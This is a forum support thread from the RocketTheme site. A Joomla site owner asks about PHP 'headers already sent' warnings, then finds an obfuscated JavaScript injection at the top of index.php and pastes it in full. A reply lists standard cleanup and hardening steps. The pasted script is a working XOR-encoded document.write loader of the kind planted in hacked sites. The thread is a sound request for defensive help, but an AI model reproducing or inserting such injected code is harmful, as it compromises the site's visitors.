ROCKETTHEME IS CLOSING ON JUNE 30, 2025. As a thank-you to our community, enjoy 50% off all themes with the promo code THANKYOU before we shut down.
Read our Farewell Blog Post for more details.
I have been searching for the answer to this everywhere but none of the suggestions have actually helped so far.
The website has been working without any errors until yesterday this warning appeared at the top of the page:
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/xxxxx/public_html/index.php:1) in /home/xxxxx/public_html/libraries/joomla/session/session.php on line 422
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/xxxxx/public_html/index.php:1) in /home/xxxxxpublic_html/libraries/joomla/session/session.php on line 422
Warning: Cannot modify header information - headers already sent by (output started at /home/xxxxx/public_html/index.php:1) in /home/xxxxx/public_html/libraries/joomla/session/session.php on line 425
Is there anyone who actually knows how to fix it?
I have been going in circles and it is driving me crazy because everything had worked absolutely fine until yesterday.
The sit ewas hacked and the below script has been put at the beginnning of the index.php code:
<script language='javascript'>var SBanVCeUbbbNowEG='';UKxFmH='FqSnrFnBDypbkWTlRyNe';var VFNodwtvYedCL='YemxkQSTmhlirxhzLQUxDSgUZMhnkLTeWxTCEnWtfrSdqhJModGoIuuiXOR';equzMykOBDZeMPPGrGVkKtab='EUomhfUyfGqTK';var KfTeqLXxjxESaUnEIQ=0;fQBDJmrFWELLkTZXwCR='woNyqDjXtCIUXMmnuNY';var rbldofMChlQiIEhxwG='%59%04%1E%19%30%3E%31%4D%1B%1E%0A%4F%5A%68%0E%38%21%6F%57%6B%3D%02%31%35%20%46%07%05%63%3D%0B%79%1B%33%2A%7A%0A%32%12%07%07%3F%10%53%48%2C%3F%0E%09%22%0D%26%07%11%0C%2A%72%70%69%47%4D%0B%08%23%3C%38%01%01%02%0E%4F%5A%06%15%6E%71%3D%1D%2D%34%0F%21%67%6F%59%4C%4B%3B%3D%01%23%10%69%61%74%4C%77%1C%15%02%32%07%14%55%68%7C%4D%44%31%1C%39%14%16%0C%65%6D%63%7B%45%6D%19%19%36%3A%3A%1A%01%08%1D%1A%45%4A%4A%6E%71%38%19%36%34%0E%3B%32%28%01%09%03%38%69%47%67%5A%6A%7F%6A%07%31%06%07%1F%36%5A';ewUMfBn='QHMqWfytvRiDopr';var nVcUhjQLBtELwYJ=rbldofMChlQiIEhxwG.length/3;RqcmkREcrBHQSN='vfADDzllfjzZIAXOVyRwhd';rbldofMChlQiIEhxwG=unescape(rbldofMChlQiIEhxwG);BlgOxMlippiaYmpVmPH='bjYavjZrtGwDSzLNps';for(CcXCJKKSbdYTTUNgYyXxO=0;CcXCJKKSbdYTTUNgYyXxO<nVcUhjQLBtELwYJ;CcXCJKKSbdYTTUNgYyXxO++){KfTeqLXxjxESaUnEIQ++;if(VFNodwtvYedCL.length<=KfTeqLXxjxESaUnEIQ) KfTeqLXxjxESaUnEIQ=0;lPLKgWFZcPl=rbldofMChlQiIEhxwG.charCodeAt(CcXCJKKSbdYTTUNgYyXxO); easyxzNXJpmKaLM='NmLhYYLOvopiPfty'; if(VFNodwtvYedCL.charCodeAt(KfTeqLXxjxESaUnEIQ)!=lPLKgWFZcPl) lPLKgWFZcPl^=VFNodwtvYedCL.charCodeAt(KfTeqLXxjxESaUnEIQ); mvkjgHDDeGWz='vrFFAqJISUmRCsTuRGU';SBanVCeUbbbNowEG+=String.fromCharCode(lPLKgWFZcPl);} PKRaQpIevWVVI='bCbjSAOcfzmeKQlYhzcILki';document.write(SBanVCeUbbbNowEG);DNHXqbDYAr='zRSGrK';</script>
Any idea how it can be prevented in the future, please?
1. You need to do is talk to your hosting provider and see if they can work out for you where and how you were hacked.
2. Ensure all your files are 'clean', either by removing any code that has been added or replacing the files with clean ones.
3. Ensure there are no 'hidden' files that have been added that can lead to further exploits.
4. When you are satisfied all your files are clean and there are no hidden files, change all your passwords for your Joomla install and your hosting account and email. Make sure they are 'robust' passwords - minimum 8 characters, use numbers and special characters like #@!
5. Last but not least, install this wonderful piece of software which will help guard against any future problems -
www.akeebabackup.com/software/admin-tools.html
- read the documentation, it works out of the box but there are certain tweaks to make which help prevent problems in the future.